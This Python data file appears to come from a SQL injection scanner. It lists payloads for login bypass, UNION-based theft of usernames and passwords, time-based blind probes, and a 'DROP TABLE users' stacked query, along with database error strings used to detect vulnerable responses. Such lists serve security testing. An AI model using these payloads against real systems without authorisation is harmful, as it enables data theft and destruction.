
QUICK_PAYLOADS = [
    "' OR '1'='1",
    "' OR '1'='1' --",
    "' OR 1=1 --",
    '" OR "1"="1',
    "1' OR '1'='1",
    "admin' --",
    "' UNION SELECT NULL --",
    "1; DROP TABLE users --",
    "' AND 1=1 --",
    "' AND 1=2 --",
]

FULL_PAYLOADS = [
    "' OR '1'='1' /*",
    "') OR ('1'='1",
    "')) OR (('1'='1",
    "' UNION SELECT NULL, NULL --",
    "' UNION SELECT NULL, NULL, NULL --",
    "' UNION SELECT username, password FROM users --",
    "1' ORDER BY 1 --",
    "1' ORDER BY 10 --",
    "' AND SLEEP(3) --",
    "' AND BENCHMARK(5000000,MD5('test')) --",
    "'; WAITFOR DELAY '0:0:3' --",
    "1' AND (SELECT COUNT(*) FROM information_schema.tables) > 0 --",
    "' OR EXISTS(SELECT * FROM users) --",
    "admin'/*",
    "' OR ''='",
    "1 OR 1=1",
    "' HAVING 1=1 --",
    "' GROUP BY 1 --",
    "'; SELECT pg_sleep(3) --",
    "' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION())) --",
    "' AND UPDATEXML(1,CONCAT(0x7e,VERSION()),1) --",
    "1' AND SUBSTR(@@version,1,1)='5' --",
    "' OR 1=1 LIMIT 1 --",
    "' UNION ALL SELECT NULL --",
    "') UNION SELECT NULL --",
]

DETECTION_PATTERNS = [
    "you have an error in your sql syntax",
    "warning: mysql",
    "unclosed quotation mark",
    "quoted string not properly terminated",
    "microsoft ole db provider for sql server",
    "microsoft sql native client error",
    "invalid query",
    "sql syntax.*mysql",
    "valid mysql result",
    "mysqlclient",
    "postgresql.*error",
    "warning.*pg_",
    "valid postgresql result",
    "npgsql",
    "ora-[0-9]{5}",
    "oracle.*driver",
    "warning.*oci_",
    "warning.*ora_",
    "sqlite.*error",
    "sqlite3.operationalerror",
    "sqlstate",
    "syntax error.*sql",
    "unrecognized token",
    "sql command not properly ended",
    "unexpected end of sql command",
    "column.*not found",
    "table.*doesn't exist",
    "unknown column",
    "no such table",
]
